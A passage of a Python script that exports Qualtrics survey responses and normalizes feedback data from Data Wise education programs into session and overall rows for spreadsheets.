apiToken,\n\t\t\t}\n\n\t\t# Step 1: Creating Data Export\n\t\tdownloadRequestUrl = baseUrl\n\t\tdownloadRequestPayload = '{\"format\":\"' + fileFormat + '\",\"useLabels\":\"true\"}'\n\t\tdownloadRequestResponse = requests.request(\"POST\", downloadRequestUrl, data=downloadRequestPayload, headers=headers)\n\t\tprogressId = downloadRequestResponse.json()[\"result\"][\"progressId\"]\n\t\tprint(downloadRequestResponse.text)\n\n\t\t# Step 2: Checking on Data Export Progress and waiting until export is ready\n\t\twhile progressStatus != \"complete\" and progressStatus != \"failed\":\n\t\t\tprint (\"progressStatus=\", progressStatus)\n\t\t\trequestCheckUrl = baseUrl + progressId\n\t\t\trequestCheckResponse = requests.request(\"GET\", requestCheckUrl, headers=headers)\n\t\t\trequestCheckProgress = requestCheckResponse.json()[\"result\"][\"percentComplete\"]\n\t\t\tprint(\"Download is \" + str(requestCheckProgress) + \" complete\")\n\t\t\tprogressStatus = requestCheckResponse.json()[\"result\"][\"status\"]\n\n\t\t#step 2.1: Check for error\n\t\tif progressStatus is \"failed\":\n\t\t\traise Exception(\"export failed\")\n\n\t\tfileId = requestCheckResponse.json()[\"result\"][\"fileId\"]\n\n\t\t# Step 3: Downloading file\n\t\trequestDownloadUrl = baseUrl + fileId + '/file'\n\t\trequestDownload = requests.request(\"GET\", requestDownloadUrl, headers=headers, stream=True)\n\n\t\t# Step 4: Unzipping the file\n\t\tfile = zipfile.ZipFile(io.BytesIO(requestDownload.content))\n\t\tfile.extractall(survey_name)\n\n\t\tfile_name = file.namelist()[0]\n\t\tcsv_path = r'' + survey_name + '/' + file_name 
+ ''\n\n\t\t# Step 5: put all values from CSV into a list so we can loop through for normalization\n\t\tvalues = []\n\n\t\t#replace test with csv_path when you're ready\n\t\twith open(csv_path, 'r', newline='') as raw_file:\n\t\t\treader = csv.reader(raw_file)\n\t\t\tfor row in reader:\n\t\t\t\tvalues.append(row)\n\n\t\t#print(values)\n\n\t\tsurvey_info = survey_name.split(\"_\")\n\t\t\n\t\tyear = survey_info[0]\n\t\tprogram = survey_info[1]\n\t\tday = ''\n\t\tif len(survey_info) == 2: \n\t\t\tday = 'N/A'\n\t\telse: \n\t\t\tday = survey_info[2]\n\n\t\tprint(program + ' ' + year + ' ' + day)\n\t\t\n\t\tnormalize_crosstab(values, program, year, day)\n\ndef historical():\n\t#download historical files, loop through, normalize, and upload\n\t#Once this is done, then we only need to run main\n\tpath_names = {\n\n\t\t'2018_DWI_Monday': 'DWI18 Monday Feedback Survey.csv',\n\t\t'2018_DWI_Tuesday': 'DWI18 Tuesday Feedback Survey.csv',\n\t\t'2018_DWI_Wednesday': 'DWI18 Wednesday Feedback Survey.csv',\n\t\t'2018_DWI_Thursday': 'DWI18 Thursday Feedback Survey.csv',\n\t\t'2018_DWI_Friday': 'DWI18 Friday Feedback Survey.csv',\n\t\t'2018_DWJ_Monday': 'DWJ18 Monday Feedback Survey.csv',\n\t\t'2018_DWJ_Tuesday': 'DWJ18 Tuesday Feedback Survey.csv',\n\t\t'2018_DWJ_Wednesday': 'DWJ18 Wednesday Feedback Survey.csv',\n\t\t'2018_DWJ_Thursday': 'DWJ18 Thursday Feedback Survey.csv',\n\t\t'2018_DWJ_Friday': 'DWJ18 Friday Feedback Survey.csv',\n\t\t'2016_DWA': 'DWA16 End Feedback Survey.csv',\n\t\t'2017_DWA': 'DWA17 End Feedback Survey.csv',\n\t\t'2018_DWO': 'DWO18 End Feedback Survey.csv'\n\n\t}\n\n\tfor path in path_names:\n\t\tprint(path)\n\n\t\tvalues = []\n\n\t\tsplit = path.split(\"_\")\n\t\tyear = split[0]\n\t\tprogram = split[1]\n\t\tday = 'N/A'\n\t\tif len(split) == 3:\n\t\t\tday = split[2]\n\n\n\t\t'''if program != 'DWO':\n\t\t\tcontinue'''\n\n\t\tpath_to_file = r'Historical/' + path_names[path] + ''\n\n\t\twith open(path_to_file, 'r', newline='',encoding='utf-8') as raw_file:\n\t\t\treader = csv.reader(raw_file)\n\t\t\tfor row in reader:\n\t\t\t\tvalues.append(row)\n\n\t\tnormalize_crosstab(values, program, year, day)\n\t\t\n\t\t\n\n\n\ndef normalize_crosstab(values, program, year, day):\n\n\tquestion_search_dict = {\n\t\t'DWH': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('foster equitable practices'): ['Equity2',\"Today's sessions helped me build skills to use Data Wise tools to foster equitable practices at each step of the improvement process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your 
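Two small hazards in the qualtrics_online.py export code above: main() calls sys.exit(2) although only argv is imported from sys, and the failure branch tests progressStatus is "failed", which compares string identity rather than equality and is not guaranteed to fire. A sketch of the polling step with both corrected; the URL layout and JSON fields are taken from the snippet itself:

import sys
import time

import requests

def wait_for_export(base_url, progress_id, headers, poll_seconds=1.0):
    # Poll a Qualtrics response export until it completes or fails.
    while True:
        result = requests.get(base_url + progress_id, headers=headers).json()["result"]
        print("Download is " + str(result["percentComplete"]) + " complete")
        if result["status"] == "complete":   # equality, not `is`
            return result["fileId"]
        if result["status"] == "failed":
            sys.exit("export failed")
        time.sleep(poll_seconds)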
professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial']\n\t\t\t\t},\n\t\t'DWJ': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support from.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWI': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('integrate equity'): ['Equity2',\"Today's sessions helped me build skills to integrate equity at each step of the improvement process.\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you 
came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t\t\t#For components, you'll also need to list the component -- split on \"-\"\n\t\t'DWO': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('teaching fellow actions'): ['TF Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('specific feedback for your Teaching Fellow'): ['TF Qualitative Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWS': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the 
course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('teaching fellow actions'): ['TF Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('specific feedback for your Teaching Fellow'): ['TF Qualitative Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWA': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('components'): ['Components', 'Please rate the extent to which each of the following components helped you to prepare to launch the Data Wise Improvement Process at your site'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"This program helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('equity lens'): ['Equity2',\"This program helped me build skills to take an equity lens in the Data Wise Improvement Process.\"]\n\t\t\t\t},\n\t\t'DWAU': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How 
would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWN': [],\n\n\t}\n\n\tfirstDataCol, role_col, team_col = getDataRoleTeamCols(values)\n\tnumDataCols = len(values[0]) - firstDataCol\n\t\n\traw_headers = values[0]\n\theaders = values[1]\n\n\toverallRows = []\n\tsessionRows = []\n\n\toverallHeader = ['Start Date','End Date','Response Type','IP Address','Progress','Duration (in seconds)','Finished','Recorded Date','Response ID',\n\t\t\t\t'Recipient Last Name','Recipient First Name','Recipient Email','External Data Reference','Location Latitude','Location Longitude','Distribution Channel','User Language']\n\n\tsessionHeader = ['Start Date','End Date','Response Type','IP Address','Progress','Duration (in seconds)','Finished','Recorded Date','Response ID',\n\t\t\t\t'Recipient Last Name','Recipient First Name','Recipient Email','External Data Reference','Location Latitude','Location Longitude','Distribution Channel','User Language']\n \n \t#Should we add a column for 'Question Category'\n \t#e.g. 
norms, equity, etc\n\toverallHeader.append('Role')\n\toverallHeader.append('Team')\n\toverallHeader.append('Program')\n\toverallHeader.append('Year')\n\toverallHeader.append('Day')\n\toverallHeader.append('Question Number')\n\toverallHeader.append('Question Category')\n\toverallHeader.append('Question Text')\n\toverallHeader.append('Response')\n\toverallHeader.append('Feedback')\n\toverallRows.append(overallHeader)\n\n\tsessionHeader.append('Role')\n\tsessionHeader.append('Team')\n\tsessionHeader.append('Program')\n\tsessionHeader.append('Year')\n\tsessionHeader.append('Day')\n\tsessionHeader.append('Session Type')\n\tsessionHeader.append('Session')\n\tsessionHeader.append('Session Leader')\n\tsessionHeader.append('Question')\n\tsessionHeader.append('Response')\n\tsessionHeader.append('Plus')\n\tsessionHeader.append('Delta')\n\tsessionRows.append(sessionHeader)\n\n\tfor i in range(3, len(values)):\n\t\trow = values[i]\n\n\t\t#Don't want these responses to be collected in our data\n\t\t#if row[2] == 'Survey Preview':\n\t\t#\tcontinue\n\n\t\trole = ''\n\t\tteam = ''\n\t\tif program == 'DWA' or program == 'DWH':\n\t\t\trole = 'Practitioner'\n\t\t\tteam = 'School Team'\n\t\telif program == 'DWO':\n\t\t\tteam = 'School Team'\n\t\t\tif role_col == 0:\n\t\t\t\trole = 'N/A'\n\t\t\telse:\n\t\t\t\trole = row[role_col]\n\t\telse:\n\t\t\tif role_col == 0:\n\t\t\t\trole = 'N/A'\n\t\t\telse:\n\t\t\t\trole = row[role_col]\n\n\t\t\tif team_col == 0:\n\t\t\t\tteam = 'N/A'\n\t\t\telse:\n\t\t\t\tteam = row[team_col]\n\n\t\t#These are the only programs with sessions, so they're the only ones\n\t\t#we want to look for sessions in\n\t\tif program == 'DWJ' or program == 'DWI' or program == 'DWAU' or program == 'DWH' or program == 'DWSB' or program == 'DWO' or program == 'DWA' or program == 'DWS':\n\n\t\t\tcurrent_type = ''\n\t\t\tcurrent_session = ''\n\t\t\tcurrent_leader = ''\n\n\t\t\tschool_team_col = 0\n\n\t\t\tfor datacol in range(numDataCols):\n\n\t\t\t\tnewRow = row[0:firstDataCol]\n\t\t\t\tquestion_number = raw_headers[firstDataCol + datacol]\n\t\t\t\tquestion_text = headers[firstDataCol + datacol].replace('\\n',' ')\n\t\t\t\tresponse = row[firstDataCol + datacol]\n\n\t\t\t\tif response == '' or response == ' ':\n\t\t\t\t\tcontinue\n\n\t\t\t\tif type(response) is str and response.find('\\n') != -1:\n\t\t\t\t\tresponse = response.replace('\\n', ' ')\n\n\n\t\t\t\t#Look for school/team name for Teaching Fellow Feedback\n\t\t\t\t#Set school_team_col so you can always access it\n\t\t\t\ts = re.search('Name of your school/team', question_text)\n\t\t\t\tif s is not None:\n\t\t\t\t\tschool_team_col = datacol\n\n\t\t\t\t#Search for session pattern\n\t\t\t\tm = re.search('\\[([^\\s]+) Session\\]', question_text)\n\t\t\t\t\n\t\t\t\t# CASE 1: A session has been found, deal with it appropriately\n\t\t\t\t# and append the results to the sessionOverall list of rows\n\t\t\t\tif m is not None:\n\n\t\t\t\t\tplus = ''\n\t\t\t\t\tdelta = ''\n\t\t\t\t\tsecond_metric_found = False\n\t\t\t\t\tsecond_question = ''\n\t\t\t\t\tsecond_response = ''\n\t\t\t\t\tnewRow1 = row[0:firstDataCol]\n\n\t\t\t\t\t#Organize first session\n\t\t\t\t\tsplit_string = re.split('[\\[|\\]|\\(|\\)|-]', question_text)\n\t\t\t\t\tsplit_string.pop(0)\n\t\t\t\t\tsession_type = split_string[0].strip()\n\t\t\t\t\tsession = split_string[1].strip()\n\t\t\t\t\tsession_leader = split_string[2].strip()\n\n\t\t\t\t\t#Don't do everything over for the next column\n\t\t\t\t\t#We'll have duplicates and that's BAD\n\t\t\t\t\tif session == current_session and 
session_leader == current_leader:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tquestion = split_string[-1].strip()\n\t\t\t\t\tsession_response = response.strip()\n\t\t\t\t\tif session_response == '' or session_response == ' ':\n\t\t\t\t\t\tsession_response = 'Blank'\n\n\t\t\t\t\t#Find the second metric, plusses, and deltas in the adjacent three columns\n\t\t\t\t\tfor j in range(datacol+1,datacol+4):\n\t\t\t\t\t\tnext_question_text = headers[firstDataCol + j].replace('\\n','')\n\t\t\t\t\t\tif re.search('\\[([^\\s]+) Session\\]', next_question_text) is not None:\n\t\t\t\t\t\t\tsecond_split = re.split('[\\[|\\]|\\(|\\)|-]', next_question_text)\n\t\t\t\t\t\t\tsecond_split.pop(0)\n\t\t\t\t\t\t\t#If we're looking at a different session then we don't want to do any of this\n\t\t\t\t\t\t\tsecond_question = second_split[-1].strip()\n\t\t\t\t\t\t\tsecond_response = row[firstDataCol + j].replace('\\n',' ').strip()\n\t\t\t\t\t\t\tif second_response == '' or second_response == ' ':\n\t\t\t\t\t\t\t\tsecond_response = 'Blank'\n\t\t\t\t\t\t\tsecond_metric_found = True\n\t\t\t\t\t\telif re.search('What worked well.*about', next_question_text) is not None:\n\t\t\t\t\t\t\t#next_question = 'What worked well about this session?'\n\t\t\t\t\t\t\tplus = row[firstDataCol + j].replace('\\n',' ')\n\t\t\t\t\t\t\tif plus == '' or plus == ' ':\n\t\t\t\t\t\t\t\tplus = 'Blank'\n\t\t\t\t\t\telif re.search('What would you.*change.*about', next_question_text) is not None:\n\t\t\t\t\t\t\t#next_question = 'What would you have liked to change about this session?'\n\t\t\t\t\t\t\tdelta = row[firstDataCol + j].replace('\\n',' ')\n\t\t\t\t\t\t\tif delta == '' or delta == ' ':\n\t\t\t\t\t\t\t\tdelta = 'Blank'\n\t\t\t\t\t\t\t#Deltas are always last so break out of loop after deltas\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tsplit_string = re.split('[\\[|\\]|\\(|\\)|-]', question_text)\n\t\t\t\t\tsplit_string.pop(0)\n\t\t\t\t\tsession_type = split_string[0].strip()\n\t\t\t\t\tsession = split_string[1].strip()\n\t\t\t\t\tsession_leader = split_string[2].strip()\n\n\t\t\t\t\tquestion = split_string[-1].strip()\n\t\t\t\t\tsession_response = response.strip()\n\n\t\t\t\t\t#Add first row\n\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\tnewRow.append(session_type)\n\t\t\t\t\tnewRow.append(session)\n\t\t\t\t\tnewRow.append(session_leader)\n\t\t\t\t\tnewRow.append(question)\n\t\t\t\t\tnewRow.append(session_response)\n\t\t\t\t\tnewRow.append(plus)\n\t\t\t\t\tnewRow.append(delta)\n\t\t\t\t\tsessionRows.append(newRow)\n\t\t\t\t\t#newRow = row[0:firstDataCol]\n\n\t\t\t\t\tif second_metric_found == True:\n\t\t\t\t\t\tnewRow1.append(role)\n\t\t\t\t\t\tnewRow1.append(team)\n\t\t\t\t\t\tnewRow1.append(program)\n\t\t\t\t\t\tnewRow1.append(year)\n\t\t\t\t\t\tnewRow1.append(day)\n\t\t\t\t\t\tnewRow1.append(session_type)\n\t\t\t\t\t\tnewRow1.append(session)\n\t\t\t\t\t\tnewRow1.append(session_leader)\n\t\t\t\t\t\tnewRow1.append(second_question)\n\t\t\t\t\t\tnewRow1.append(second_response)\n\t\t\t\t\t\tnewRow1.append(plus)\n\t\t\t\t\t\tnewRow1.append(delta)\n\t\t\t\t\t\tsessionRows.append(newRow1)\n\n\t\t\t\t\n\t\t\t\t\tcurrent_type = session_type\n\t\t\t\t\tcurrent_session = session\n\t\t\t\t\tcurrent_leader = session_leader\n\n\t\t\t\t\t#Skip the next column so that we don't end up with duplicates\n\n\t\t\t\t#Depending on Program, look to see if question text is a different question that we care about\n\t\t\t\t#Add to overallRows if it 
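The session-parsing branch above pulls the session type, title, leader, and question out of headers shaped like [Type Session] (Title) - Leader - Question using a single character class. A runnable illustration on a hypothetical header; the sample text is invented, while the search pattern and split class come from the snippet (filtering blanks stands in for its pop/strip bookkeeping):

import re

header = "[Plenary Session] (Data Wise Norms) - J. Doe - How useful was this session?"

if re.search(r'\[([^\s]+) Session\]', header):
    parts = [p.strip() for p in re.split(r'[\[\]()-]', header) if p.strip()]
    session_type, session, leader, question = parts
    print(session_type, '|', session, '|', leader, '|', question)
    # Plenary Session | Data Wise Norms | J. Doe | How useful was this session?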
is\n\t\t\t\telse:\n\t\t\t\t\t#print(question_text)\n\t\t\t\t\tfor regex in question_search_dict[program]:\n\n\t\t\t\t\t\tm = regex.search(question_text)\n\n\t\t\t\t\t\tif m is not None:\n\t\t\t\t\t\t\tquestion_category = question_search_dict[program][regex][0]\n\t\t\t\t\t\t\tif question_category == 'Recommend':\n\t\t\t\t\t\t\t\tresponse = response.split(' ')[0]\n\t\t\t\t\t\t\tnew_question_text = question_search_dict[program][regex][1]\n\t\t\t\t\t\t\tif question_category in ['Team Norms', 'Group Norms', 'Components', 'Objectives', 'Support', 'TF Feedback']:\n\t\t\t\t\t\t\t\tnew_question_text = question_text.split(\"-\")[-1].strip()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Feedback must be the question immediately after the equity question\n\t\t\t\t\t\t\tfeedback = ''\n\t\t\t\t\t\t\tif question_category == 'Equity1' or question_category == 'Equity2':\n\t\t\t\t\t\t\t\tfeedback = row[firstDataCol + datacol + 1]\n\t\t\t\t\t\t\t\tif feedback == '' or feedback == ' ':\n\t\t\t\t\t\t\t\t\tfeedback = 'Blank'\n\n\n\t\t\t\t\t\t\t#Put feedback in the feedback column and not in the response column\n\t\t\t\t\t\t\tif question_category == 'TF Qualitative Feedback':\n\t\t\t\t\t\t\t\tfeedback = response\n\t\t\t\t\t\t\t\tresponse = ''\n\n\t\t\t\t\t\t\t#Put school/team value in column M if it's a feedback question\n\t\t\t\t\t\t\tif question_category in ['TF Feedback', 'TF Qualitative Feedback']:\n\t\t\t\t\t\t\t\tschool_team = row[firstDataCol + school_team_col]\n\t\t\t\t\t\t\t\tnewRow[12] = school_team\n\n\t\t\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\t\t\tnewRow.append(question_number)\n\t\t\t\t\t\t\tnewRow.append(question_category)\n\t\t\t\t\t\t\tnewRow.append(new_question_text)\n\t\t\t\t\t\t\tnewRow.append(response)\n\t\t\t\t\t\t\tnewRow.append(feedback)\n\t\t\t\t\t\t\toverallRows.append(newRow)\n\t\t\t\t\t\t\t#we're duplicating info here because the equity questions are part of the objectives\n\t\t\t\t\t\t\t#objectives come first, so if we find them, get out of here!\n\t\t\t\t\t\t\tbreak\n\n\n\t\t#Otherwise we're just looking for overall questions for programs\n\t\telse:\n\n\t\t\tfor datacol in range(numDataCols):\n\t\t\t\tnewRow = row[0:firstDataCol]\n\t\t\t\tquestion_number = raw_headers[firstDataCol + datacol]\n\t\t\t\tquestion_text = headers[firstDataCol + datacol].replace('\\n','')\n\t\t\t\tresponse = row[firstDataCol + datacol]\n\n\t\t\t\tif response == '' or response == ' ':\n\t\t\t\t\tcontinue\n\n\t\t\t\tif type(response) is str and response.find('\\n') != -1:\n\t\t\t\t\tresponse = response.replace('\\n', ' ')\n\t\t\t\t\n\t\t\t\tfor regex in question_search_dict[program]:\n\n\t\t\t\t\tm = regex.search(question_text)\n\n\t\t\t\t\tif m is not None:\n\n\t\t\t\t\t\tquestion_category = question_search_dict[program][regex][0]\n\t\t\t\t\t\tif question_category == 'Recommend':\n\t\t\t\t\t\t\tresponse = response.split(' ')[0]\n\t\t\t\t\t\tnew_question_text = question_search_dict[program][regex][1]\n\t\t\t\t\t\tif question_category in ['Team Norms', 'Group Norms', 'Components', 'Objectives', 'Support']:\n\t\t\t\t\t\t\tnew_question_text = question_text.split(\"-\")[-1].strip()\n\n\t\t\t\t\t\tfeedback = ''\n\t\t\t\t\t\tif question_category == 'Equity1' or question_category == 'Equity2':\n\t\t\t\t\t\t\tfeedback = row[firstDataCol + datacol + 1]\n\t\t\t\t\t\tif feedback == '' or feedback == ' ':\n\t\t\t\t\t\t\tfeedback = 
'Blank'\n\n\t\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\t\tnewRow.append(question_number)\n\t\t\t\t\t\tnewRow.append(question_category)\n\t\t\t\t\t\tnewRow.append(new_question_text)\n\t\t\t\t\t\tnewRow.append(response)\n\t\t\t\t\t\tnewRow.append(feedback)\n\t\t\t\t\t\toverallRows.append(newRow)\n\n\t\t#break\n\t\n\t'''with open('test/output.csv', 'w') as outfile:\n\t\twriter = csv.writer(outfile)\n\t\twriter.writerows(sessionRows)'''\n\n\n\tappendToSheets(sessionRows, overallRows)\n\n\ndef getDataRoleTeamCols(values):\n\t#get data cols\n\tfirstDataCol = 0\n\t#regex = re.compile('Q[0-9]')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[0][i]\n\t\tm = column.find('UserLanguage')\n\t\tif m != -1:\n\t\t\tfirstDataCol = i + 1\n\t\t\tbreak\n\n\trole_col = 0\n\t#regex2 = re.compile('What is your role')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[1][i]\n\t\tm = column.find('What is your role')\n\t\tif m != -1:\n\t\t\trole_col = i\n\t\t\tbreak\n\n\tteam_col = 0\n\t#regex3 = 